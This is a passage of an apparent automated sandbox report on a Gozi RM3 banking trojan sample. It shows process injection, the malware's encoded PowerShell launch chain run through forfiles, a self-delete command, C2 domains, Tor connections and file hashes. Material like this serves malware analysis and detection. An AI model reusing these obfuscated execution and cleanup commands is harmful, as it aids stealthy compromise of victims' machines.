N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1964 wrote to memory of 1576 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1964 wrote to memory of 1576 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1964 wrote to memory of 1576 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1964 wrote to memory of 1576 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1964 wrote to memory of 640 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1964 wrote to memory of 640 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1964 wrote to memory of 640 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1964 wrote to memory of 640 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 964 wrote to memory of 592 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 964 wrote to memory of 592 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 964 wrote to memory of 592 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 592 wrote to memory of 1096 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 592 wrote to memory of 1096 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 592 wrote to memory of 1096 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 1096 wrote to memory of 1796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1096 wrote to memory of 1796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1096 wrote to memory of 1796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1796 wrote to memory of 560 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1796 wrote to memory of 560 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1796 wrote to memory of 560 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1796 wrote to memory of 1876 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1796 wrote to memory of 1876 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1796 wrote to memory of 1876 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1796 wrote to memory of 1884 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1796 wrote to memory of 1884 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1796 wrote to memory of 1884 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1884 wrote to memory of 1344 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1884 wrote to memory of 1344 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1884 wrote to memory of 1344 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1796 wrote to memory of 1968 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1796 wrote to memory of 1968 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1796 wrote to memory of 1968 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1968 wrote to memory of 840 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1968 wrote to memory of 840 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1968 wrote to memory of 840 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1796 wrote to memory of 1276 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 580 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp\Restr.exe C:\Windows\Explorer.EXE
PID 560 wrote to memory of 2024 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 560 wrote to memory of 2024 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 560 wrote to memory of 2024 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Restr.exe

"C:\Users\Admin\AppData\Local\Temp\Restr.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1964 CREDAT:275457 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1964 CREDAT:734213 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBlAGMAdQByAGkAdAB5AGMAYQBjAGgAZQAnACkALgBMAA== & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\forfiles.exe

forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBlAGMAdQByAGkAdAB5AGMAYQBjAGgAZQAnACkALgBMAA== & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\cmd.exe

/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBlAGMAdQByAGkAdAB5AGMAYQBjAGgAZQAnACkALgBMAA== & exit

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBlAGMAdQByAGkAdAB5AGMAYQBjAGgAZQAnACkALgBMAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pfhkfkff.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE7D1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE7D0.tmp"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dlbyujxt.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE88C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE88B.tmp"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C timeout /t 5 && del "C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\RESTR.EXE"

C:\Windows\system32\timeout.exe

timeout /t 5

Network

Country Destination Domain Proto
US 8.8.8.8:53 gogojoob.xyz udp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 45.58.156.76:443 tcp
NL 45.137.184.31:80 45.137.184.31 tcp
US 209.141.45.189:80 209.141.45.189 tcp
CA 158.69.205.247:9030 158.69.205.247 tcp
US 199.249.230.185:80 199.249.230.185 tcp
NL 50.7.178.34:80 tcp
DE 159.69.207.20:80 159.69.207.20 tcp
RO 89.34.27.237:9030 89.34.27.237 tcp
NL 45.137.184.31:80 45.137.184.31 tcp
VN 125.212.217.197:80 125.212.217.197 tcp
DE 159.69.207.20:80 159.69.207.20 tcp
US 74.91.21.2:80 74.91.21.2 tcp
US 8.8.8.8:53 unavas.xyz udp
US 8.8.8.8:53 microsoft.com udp
NL 91.242.229.120:443 unavas.xyz tcp
US 64.44.51.37:80 64.44.51.37 tcp
VN 125.212.217.197:80 125.212.217.197 tcp
US 209.141.45.189:80 209.141.45.189 tcp
JP 172.104.79.222:80 172.104.79.222 tcp
DE 5.9.98.43:80 5.9.98.43 tcp
IN 159.89.174.9:80 159.89.174.9 tcp
RO 89.34.27.237:9030 89.34.27.237 tcp
US 185.220.103.112:80 185.220.103.112 tcp
US 199.249.230.168:80 199.249.230.168 tcp
SE 193.189.100.200:80 193.189.100.200 tcp
DE 90.186.84.208:8080 90.186.84.208 tcp
NL 5.255.102.5:9030 5.255.102.5 tcp
ZA 160.119.249.223:80 160.119.249.223 tcp
EG 41.215.241.146:80 41.215.241.146 tcp
US 172.104.208.190:80 172.104.208.190 tcp
US 8.8.8.8:53 curlmyip.net udp
FI 135.181.84.242:80 curlmyip.net tcp
NL 91.242.229.120:443 unavas.xyz tcp
US 199.249.230.70:80 199.249.230.70 tcp
US 172.104.208.190:80 172.104.208.190 tcp
DE 78.47.226.12:80 78.47.226.12 tcp
US 199.249.230.106:80 tcp
ID 195.123.237.137:80 tcp
N/A 92.243.29.88:80 tcp
N/A 46.105.143.215:80 tcp

Files

memory/580-54-0x00000000004EE000-0x00000000004F9000-memory.dmp

memory/580-55-0x0000000075561000-0x0000000075563000-memory.dmp

memory/580-56-0x0000000000230000-0x0000000000240000-memory.dmp

memory/580-62-0x00000000004EE000-0x00000000004F9000-memory.dmp

memory/580-63-0x0000000000220000-0x000000000022C000-memory.dmp

memory/580-64-0x0000000001000000-0x000000000106F000-memory.dmp

memory/580-65-0x0000000000260000-0x0000000000262000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\shpg9mq\imagestore.dat

MD5 cf1d9b7e6db5d38ad1494fef64ba15f8
SHA1 14f50426b33a2a34a62d5d823b010ce4c2448a26
SHA256 f58466e76a8e135ba4e7a6fcdb7b9182d260d0f8f3fde42205a8809a1881c4fc
SHA512 a5aa3dfb337f0e1a4d3b37d696ad9468e78e263a1e9be0641e563176e7304342d92e56ca7d749550772f454ea1bdd9e480359c822e63952bc1746c990f4c1482

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 75bca1074ab33955b44e3030145e39d8
SHA1 a81fa702521d435493aaafc858c3e1ca1eea7736
SHA256 f531cc5ef009af1c212af7590fcb214c84329097ad004f5afb47597afb1eb63e
SHA512 ad45c3e8130a460eb6c5b8eece533bc87eaf334bcbaa6d42d96f6ed8cde4f95a40109b68f8c45f69a9076ab0f35d60b143a7f32ffe854f63a9ab9cd7e921f315

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 164f34e118ffa81fd94da3934cb32de0
SHA1 3c20360423203bd85a55728566d0fdd01b7a90c3
SHA256 e92f2aec6ac7589bcb49359843bfe15d914a12e3650c5da8ab0e3b4ff9a2c25b
SHA512 560a5c9cd75ca10f25d98ff854cb5642788afbbccb510387314091dbf28df23106a6864a1ce2e30d5330e8ff067f61573b316324b552bce9f32dccd59f87fad3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 54e9306f95f32e50ccd58af19753d929
SHA1 eab9457321f34d4dcf7d4a0ac83edc9131bf7c57
SHA256 45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72
SHA512 8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GC0VJYYE\favicon[1].ico

MD5 a976d227e5d1dcf62f5f7e623211dd1b
SHA1 a2a9dc1abdd3d888484678663928cb024c359ee6
SHA256 66332859bd8e3441a019e073a318b62a47014ba244121301034b510dc7532271
SHA512 6754d545f2ce095cfa1fa7ca9e3223f89e37726ee7e541ebcf3e209e18b2602f3be8677598cb30d697327a63de032c11dbf8ef7ad7889a79c488a21044c1cb3f

memory/1796-71-0x000007FEFB901000-0x000007FEFB903000-memory.dmp

memory/1796-72-0x000007FEF2DA0000-0x000007FEF38FD000-memory.dmp

memory/1796-73-0x000000001B7A0000-0x000000001BA9F000-memory.dmp

memory/1796-75-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 7a2fb51813dfa70bb9fb08e62fb386bf
SHA1 ed451953d56863d5bfe99c82a66491dff351c071
SHA256 795509e12528cdeec84bd934eb24638fe49ad13a7578d4798ce05b7b80774e15
SHA512 867f604daee4652c9f50c5148bb22acd52b94b7acfda2ba629b4de8aadd1d7a6ceebb19b6380bbc5c0682865393b0a95838ed5ca620ec097c2c69411cb87782d

memory/1796-76-0x000000000264B000-0x000000000266A000-memory.dmp

memory/1796-78-0x0000000002640000-0x0000000002642000-memory.dmp

memory/1796-80-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

memory/560-81-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

memory/560-82-0x0000000002310000-0x0000000002312000-memory.dmp

memory/560-79-0x000007FEF2DA0000-0x000007FEF38FD000-memory.dmp

memory/560-83-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

memory/1796-84-0x0000000002642000-0x0000000002644000-memory.dmp

memory/560-86-0x0000000002312000-0x0000000002314000-memory.dmp

memory/560-87-0x0000000002314000-0x0000000002317000-memory.dmp

memory/1796-85-0x0000000002644000-0x0000000002647000-memory.dmp

memory/560-88-0x000000000231B000-0x000000000233A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 7a2fb51813dfa70bb9fb08e62fb386bf
SHA1 ed451953d56863d5bfe99c82a66491dff351c071
SHA256 795509e12528cdeec84bd934eb24638fe49ad13a7578d4798ce05b7b80774e15
SHA512 867f604daee4652c9f50c5148bb22acd52b94b7acfda2ba629b4de8aadd1d7a6ceebb19b6380bbc5c0682865393b0a95838ed5ca620ec097c2c69411cb87782d

memory/1876-91-0x000007FEF2DA0000-0x000007FEF38FD000-memory.dmp

memory/1876-92-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

memory/1876-93-0x00000000025A0000-0x00000000025A2000-memory.dmp

memory/1876-94-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

memory/1876-95-0x00000000025A2000-0x00000000025A4000-memory.dmp

memory/1876-96-0x00000000025A4000-0x00000000025A7000-memory.dmp

memory/1876-97-0x000000001B760000-0x000000001BA5F000-memory.dmp

memory/1876-98-0x00000000025AB000-0x00000000025CA000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\pfhkfkff.cmdline

MD5 b4f79294fb175869204337183317c7b6
SHA1 9043d28be6bd880fea48d6ee0c28642ea7b2b769
SHA256 30d452c48543be7ccaa18439e019af641ef0b8912dd5e5b87ad9e41569884f18
SHA512 349493b8be6c0d514ffc10df4ccbc203ddf122bfe74e5feab1ec0d09f401b9b34a032659b1a9d74b11df9f3a395019c220d834bc731c4560650dc0c2b55e26da

\??\c:\Users\Admin\AppData\Local\Temp\pfhkfkff.0.cs

MD5 7fceb996f934e8bda687cdd2bd46a9a7
SHA1 81e1edbcca6438daaccc3845fa0e3b1a6cff17a6
SHA256 fa53f8174510a9ad008973d47798f022b681e1764a15134efd2004980f23bb6e
SHA512 6aa6253527b72c0605859180887ff19cd96412cb816ec02e832d4a0e0cbcd03d9cc580112e4e2055d4a9ede850c1a339df974371f992b0b9b73e54e137610205

\??\c:\Users\Admin\AppData\Local\Temp\CSCE7D0.tmp

MD5 e41d3554c62da6b2e255453c45e4d62c
SHA1 3361c9b742d2c444141e070fabd889719eb8f9cb
SHA256 a222b452f29a2a0e02fcfe65f9174aec0537c2786ba2f1662c56eb20e1f15c99
SHA512 598d7a3a37df49f4537de27aa16cf7d7aad8d0902162d22876d455a4e1581e96b726c91df036e93410eaac6c94c91b544798d0294342656ea2680be87c184f5d

C:\Users\Admin\AppData\Local\Temp\RESE7D1.tmp

MD5 72f135063c9da43eb64b6d54f413cc88
SHA1 70f0182e690f43eed1bd1c32f02631d40e322fec
SHA256 2edd93d1c32700d1b1f798e337feb5b2c56448950170cd951d1c8fa64776ed7b
SHA512 edf62a6421d9913951268ff1767af8bbab52fc140b48848515d5462dda9f42da79dcfd184027c19727ceccc74de78705def6d74cd2016ed74e803e6fd80d9526

C:\Users\Admin\AppData\Local\Temp\pfhkfkff.dll

MD5 403a630dda434e3236ea9e0d3fbb4207
SHA1 f871f6347f25c021cac34a14324785588b37fa05
SHA256 64b009ca8d0223ac9178d4821682e6575aef461e52bfa4ff4bddf5e16e559a37
SHA512 e3f394a1429d9b80b95fc34845fdc6691aa3c615016843c6f8ce47b4b8829df57844be30b7429ce3eabe239b0b219c01e8fdc7c13ad71edbe2d29811a33a9ea7

C:\Users\Admin\AppData\Local\Temp\pfhkfkff.pdb

MD5 6b5c1d59c6c2feec9a915ee3ab36b7f7
SHA1 2da1f4310a1ffd0d049973ccd3aed5b569f7d99b
SHA256 ff0cdba3de7823b8685f868bdb8b65fed5fe68b4b5df765c8ec551b90634ed77
SHA512 2a62d7bc9339dfafdf03e4bf16365bced4e7ac1a9e34516a8c401a103bdaeb673a101eac398d64c49a79e61f8d0acd2c8fbd532cfbf947f32601ea814955bfb2

\??\c:\Users\Admin\AppData\Local\Temp\dlbyujxt.cmdline

MD5 8368148e7e5638c91bc16cca4cbbe9eb
SHA1 911cc3a7d03092c707fefe07121ecf8bded76d2f
SHA256 11fb20506e30c139e1747df4eaed260f8d5c60532ef94fe05a41f6b542ed0f72
SHA512 0c3ff5dd1a174539606320608199252a63b812bf4f2e7c61856eeb68ea640313c9214dc4c062fa7de2003b628ac4b3b8ec9282d85591d3efc9fd8f77876d8a58

\??\c:\Users\Admin\AppData\Local\Temp\dlbyujxt.0.cs

MD5 697f16b8c6892082559d8a17db343865
SHA1 246d6ba1419478be7915e78b61525da894321fb9
SHA256 518ab091348dea4f49183958185b3d42b5ddb191007bab25b6e69ff6ec923f1f
SHA512 801a428c5dd5ff4a745923914505dcf5a9929b3dbfc5bb5f6320996ad849fa42dc75ac53a432dd01103e0d6db2269583351f14b189a76a066d6f940ff79d38d6

\??\c:\Users\Admin\AppData\Local\Temp\CSCE88B.tmp

MD5 6b1dac15864f45bc67989a3a72e1e839
SHA1 027ab65a5d0c466071d3556889d3af8258ec4477
SHA256 3f2a2252aac57c1c3c156d9353446b5e3a4f029c8da0303fbe74c207ef317d82
SHA512 df376b2b4e39669936680dd965d7f69616437a2a3db215e9cff7f907b4a206b76bdaf5320fd13b51fba50179e80614000f2ac031c280b8fb6492bd5079416a46

C:\Users\Admin\AppData\Local\Temp\dlbyujxt.pdb

MD5 9f578093ff57b6ebbbdf7c6f258c3955
SHA1 9dda4e2094f20557f24d77dc674e20dd2c05ca5b
SHA256 4e90ad9020eccab7757aa00d003ed543d4511661c92d4b24ff8475a18d346d90
SHA512 bb93838e246c373f0b8013fe8c1773d8cfb0b931f14729289102242ba0d22ffc0c4274086e1322bc5f54d1099e97e093f84bf1b803134edb75b085d9525059fa

C:\Users\Admin\AppData\Local\Temp\dlbyujxt.dll

MD5 afd0641caf565e7fd099f09871f476fb
SHA1 cc95df20b7066fabd55027c9b498e7d0bc2f0a6a
SHA256 57e9a0a402ae1e190f46360ab7a3125f7a6bf07703d78da4ce77ec0a52be7c28
SHA512 8ffb0c3a16d54da2c968ef2af60b69ab7c4109150c94b6d15ebeb11ce53796642ebcd9d248f6ee7f218d73d861faa83c8d938a5a9c7d082af0ba119a40dcac36

C:\Users\Admin\AppData\Local\Temp\RESE88C.tmp

MD5 257c2dff6a6918a675ed92bd6b0adda6
SHA1 69c2155204bfd7f9ffec84d70bd8609f065f50b5
SHA256 fee86a16012c6c7b54989a13b668303cd4c5ae293417a32887ed4e23cf7c230a
SHA512 a4894ab52bdfd9d2c5909d8d7f9ffe4a1adba160d806c35fce0a7286dcd551baa11ce5f3a1079bec1a13a5a3ddece73e56fa2bbd280de4968f2368a1f99f6372

memory/1796-111-0x00000000028D0000-0x00000000028E3000-memory.dmp

memory/580-112-0x0000000000260000-0x000000000027A000-memory.dmp

memory/1276-223-0x0000000002A20000-0x0000000002A35000-memory.dmp

memory/1276-222-0x0000000002A50000-0x0000000002A65000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-03-15 07:24

Reported

2022-03-15 07:27

Platform

win10v2004-20220310-en

Max time kernel

138s

Max time network

142s

Command Line

C:\Windows\Explorer.EXE

Signatures

Gozi RM3

banker trojan gozi_rm3

Uses Tor communications

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Restr.exe

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000a5e7366ad98a250a622ef78dbb43b871080b4c72ca92a2653e990cc1eacce429000000000e8000000002000020000000cdab38de3e5895af19090244b9293a1f89573a58ec77cbf692a49c30503c1526c0000000f07412935dbfafce97f7f6290e569d60ccd2f3bfb0289d908a315016c9928bc4687967c4d9e10eadfd7bbc02cf069c38dcfca9bc6f9bfc69c86b52268e4202c39e2a0bb0a29324b4668eb9c750c73e51b4b33a854db31a5c9bf30f0b3ed5e543b23c004cd4f113de65c345b13cc004ccf52650a072a1e49c6378715b711271680721a6ecc0a3be84c06dd9e33d07b899a20bbaa34a84c9dfabc1372c54ce84e2d21f08ec27d400bfcca6b0d13262ec56d53e553dec2c1af0203ecd63c74f480140000000e14f522f5869c2b466d4d27af468692729d4aae77f4117cb26a8d77b7c6f3eafde0e8e2ba50cdfe99a1b457725ea00598a3190b0d0d5878c69af3996ca6fa8bf C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b60000000002000000000010660000000100002000000044c48119f9b6de8ee7e972740e5def4b2e64020912c925a9692e9984b66996b7000000000e80000000020000200000004e22fab96d2244e7d64043d965eb00e172d12958520b379f3f9301b973b20c28c00000008b824bd61abacba1258350299d9f0a9651dbe303495bcddb1ae42dded6caab6c79e4fd171112cf3c09909b7c53fec9fe0ddffc206b3dae80a47cc2e839fa29e91854390a8e62f8813c46371d10e80e714a9fb1a016d3d1a7d977e463af4b23eae8b16dc4e111a78b8b3adc3c1c088815c2fcb6d384b513d100ed689384899b978e0afb6ee90aad630bc382e74912b63b615fc3306edd6f932fe374de068bed4db8e7c4b4473ff8b6ea1c0644e30b7b7cfb128e1b69ab65d8ddd6ccb48aad895e40000000aeb14c94dac3ae8e82f9c569c6d9ff7ab0d33daeb5d245a008bc0740cde9fde5509615fc1e5b0acbee17d1c72c7b5d8500bf1267c7b1eff56e6c2462960f56bd C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
